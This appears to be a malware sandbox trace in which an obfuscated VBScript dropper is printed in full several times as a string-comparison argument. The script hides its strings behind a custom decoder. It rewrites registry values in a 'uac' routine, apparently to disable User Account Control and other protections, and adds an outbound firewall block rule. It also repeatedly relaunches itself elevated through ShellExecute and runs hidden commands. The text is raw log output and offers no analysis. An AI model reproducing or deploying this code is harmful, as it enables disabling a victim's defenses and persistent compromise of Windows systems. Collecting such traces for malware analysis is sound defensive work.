bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 99 [0223.022] wcsncmp (_String1="tion = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0223.022] wcsncmp (_String1="ion = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0223.022] wcsncmp (_String1="on = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0223.022] wcsncmp (_String1="n = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0223.022] wcsncmp (_String1=" = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add 